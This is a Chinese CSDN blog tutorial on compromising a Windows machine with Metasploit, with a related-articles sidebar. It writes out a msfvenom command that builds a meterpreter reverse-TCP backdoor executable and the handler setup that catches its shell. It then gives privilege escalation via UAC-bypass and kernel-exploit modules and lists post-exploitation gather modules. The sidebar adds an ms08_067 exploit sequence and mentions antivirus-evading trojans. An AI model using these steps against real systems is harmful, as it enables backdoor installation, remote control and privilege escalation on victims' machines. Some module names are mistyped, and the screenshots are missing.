msf windows简单渗透

最新推荐文章于 2024-05-30 14:18:45 发布
最新推荐文章于 2024-05-30 14:18:45 发布
阅读量1.9k 收藏 9
点赞数
分类专栏: msf 提权 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/108110355
版权

建立后门

一 建立反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe

二 监听端口建立回话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.1.8

LHOST =>192.168.1.8

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 4444

LPORT => 4444

5 发动攻击

msfexploit(multi/handler) > exploit  # (或者run)

三 目标机器执行shell后门脚本

在这里插入图片描述获得一个普通用户权限

尝试提权失败
在这里插入图片描述权限提升思路:

  1. 提高程序运行级别
  2. Uac绕过
  3. 利用提权漏洞进行绕过

权限提升

exploit/windows/local/ask

在这里插入图片描述执行完后,目标机器就会弹出
在这里插入图片描述
我们就会获得一个新的session
在这里插入图片描述
再次尝试提权就会成功

在这里插入图片描述另一种权限提升思路:
UAC绕过
msf模块:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

我们使用第一个模块:

use exploit/windows/local/bypassuac

设置低权限的session

msf5 exploit(windows/local/bypassuac) > set session 1

开始执行,发现提权成功
在这里插入图片描述

利用提权漏洞进行提权:
exploit/windows/local/ms14_058_track_popup_menu

提权失败,看提示信息这种漏洞只支持32位的操作系统,而目标机器是64位的

在这里插入图片描述利用模块

exploit/windows/local/ms16_016_webdav

该模块同样不支持64位操作系统

在这里插入图片描述

信息收集

msf 模块
获取目标机器的分区情况:

post/windows/gather/forensics/enum_drives

在这里插入图片描述

判断是否为虚拟机:

post/windows/gather/checkvm

在这里插入图片描述

开启了哪些服务:

post/windows/gather/enum_services

在这里插入图片描述

安装了哪些应用:

posst/windows/gather/enum_applications

在这里插入图片描述

查看共享:

post/windows/gather/enum_applications

获得主机最近的系统操作:

post/windows/gather/dumplinks

查看补丁:

post/windows/gather/enum_patches

自动化脚本:

scraper脚本
Winenum脚本

参考文章:
https://blog.csdn.net/u012991692/article/details/80784258

西部壮仔
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试神器-msf基础
2301_77147676的博客
03-23 217
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
windows安装Metasploit
天道酬勤
04-10 1290
windwos安装Metasploit
windows提权--MSF全自动
金灰的博客
04-19 489
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等拿到webshell后,我们通过MSF进行全自动的提权.
msf攻击windows实例
最新发布
qq_52712762的博客
05-30 1501
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
Windows之metasploit安装
2201_75735270的博客
12-23 1077
​​就是一个漏洞框架。它的全称叫做​​,简称叫做​​MSF​​。​​作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。0x01 安装、基本操作kali Linux自带Metasploit,直接使用命令msfconsole启动即可windows 可安装windows版本的msf,然后cmd启动msfconsole (windows最新版本​​下载链接​​) 提取码:5qmi​ 2、建立搜索缓存(数据库)启动​​数据库服务:​。
MSF安装使用指导案例
weixin_45450567的博客
07-05 1005
Metasploit(MSF)是一个免费的、可下载的框架,它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
kali 渗透msf
11-14
kali渗透测试利器
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 622
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4678
win10系统攻击msf
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1930
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
Windows安装msf工具教程
weixin_42899191的博客
08-30 916
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了一系列的漏洞利用模块和Payloads,用于评估和测试系统的安全性。在Windows系统上安装和配置Metasploit Framework可以按照以下步骤进行: 安装依赖软件: 安装Ruby:Metasploit Framework是使用Ruby编写的,你可以从Ruby官方网站(https://...
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
渗透测试工具MSF
2303_77223717的博客
07-08 1128
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
msf生成win版免杀木马
weixin_40709439的博客
01-24 7116
参考一大佬的 在linux下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py 查看下py的内容 将buf值全部替换成mo.py的,其他不用修改 from c...
msf渗透windows
10-10
了解,MSF(Metasploit Framework)可以用于渗透测试和漏洞利用,也可以用于攻击。在Windows系统中,可以使用MSF来获取对系统的访问权限和控制权。以下是一些基本步骤: 1. 确认目标IP地址 2. 选择合适的漏洞利用模块 3. 设置参数 4. 运行exploit 例如,使用ms08_067_netapi漏洞利用模块: 1. 确认目标机器的IP地址: ``` nmap -sS 192.168.0.0/24 ``` 2. 选择ms08_067_netapi漏洞利用模块: ``` use windows/smb/ms08_067_netapi ``` 3. 设置相关参数: ``` set RHOSTS 192.168.0.5 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.10 ``` 4. 运行exploit: ``` exploit ``` 以上步骤仅供参考,具体操作需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值